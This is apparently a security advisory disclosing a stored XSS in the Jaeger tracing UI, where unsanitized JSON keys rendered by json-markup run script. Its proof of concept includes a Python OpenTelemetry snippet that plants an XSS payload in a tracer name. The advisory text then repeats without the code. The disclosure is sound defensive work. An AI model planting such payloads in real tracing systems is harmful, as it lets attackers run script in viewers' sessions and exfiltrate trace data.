Summary
There is a stored XSS when viewing trace details. The XSS happens while rendering key-value tables in jaeger UI using the KeyValuesTable component.
Details
The offending component is the KeyValuesTable.tsx (https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L64), which uses the dangerouslySetInnerHTML function to render html markup generated by 'json-markup' package from the input values that are potentially controllable by an attacker.
The json-markup package (https://github.com/mafintosh/json-markup/blob/master/index.js#L88) does not properly sanitize keys in json objects.
PoC
In order to reproduce, perform the following steps:
- start a new instance of jaeger (I used the latest all-in-one docker image):
docker run -d --name jaeger \
-e COLLECTOR_ZIPKIN_HOST_PORT=:9411 \
-e COLLECTOR_OTLP_ENABLED=true \
-p 6831:6831/udp \
-p 6832:6832/udp \
-p 5778:5778 \
-p 16686:16686 \
-p 4317:4317 \
-p 4318:4318 \
-p 14250:14250 \
-p 14268:14268 \
-p 14269:14269 \
-p 9411:9411 \
jaegertracing/all-in-one:1.46
- Use the following python snippet to generate the trace that exploits the XSS:
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.sdk.resources import SERVICE_NAME, Resource
import grpc
resource = Resource(attributes={
SERVICE_NAME: "solidlab"
})
provider = TracerProvider(resource=resource)
otlp_exporter = OTLPSpanExporter(endpoint="http://localhost:4317")
processor = BatchSpanProcessor(otlp_exporter)
provider.add_span_processor(processor)
trace.set_tracer_provider(provider)
tracer = trace.get_tracer("{\"<input onfocus=alert(document.domain) autofocus>\":\"solidlab.tracer\"}")
with tracer.start_as_current_span("test_span") as span:
span.set_attribute('test_attr', 'test_val')
- In the jaeger UI on http://localhost:16686/, select the 'solidlab' service, select the only trace present, open the span and expand the tags section. An alert box will pop up :
Impact
If an attacker controls the "key" part of a key-value pair (in a tag/logs/process), he can inject a js payload that will be executed once the offending trace is viewed and the corresponding section (tags/process/logs) is opened. Using an xss, an attacker would be able to perform arbitrary jaeger queries and exfiltrate returned data.
Mitigation
Patch json-markup library to properly sanitize object keys.
Credits
Discovered by Georgy Noseevich (@webpentest) from Solidlab LLC.
Summary
There is a stored XSS when viewing trace details. The XSS happens while rendering key-value tables in jaeger UI using the KeyValuesTable component.
Details
The offending component is the KeyValuesTable.tsx (https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L64), which uses the dangerouslySetInnerHTML function to render html markup generated by 'json-markup' package from the input values that are potentially controllable by an attacker.
The json-markup package (https://github.com/mafintosh/json-markup/blob/master/index.js#L88) does not properly sanitize keys in json objects.
PoC
In order to reproduce, perform the following steps:
Impact
If an attacker controls the "key" part of a key-value pair (in a tag/logs/process), he can inject a js payload that will be executed once the offending trace is viewed and the corresponding section (tags/process/logs) is opened. Using an xss, an attacker would be able to perform arbitrary jaeger queries and exfiltrate returned data.
Mitigation
Patch json-markup library to properly sanitize object keys.
Credits
Discovered by Georgy Noseevich (@webpentest) from Solidlab LLC.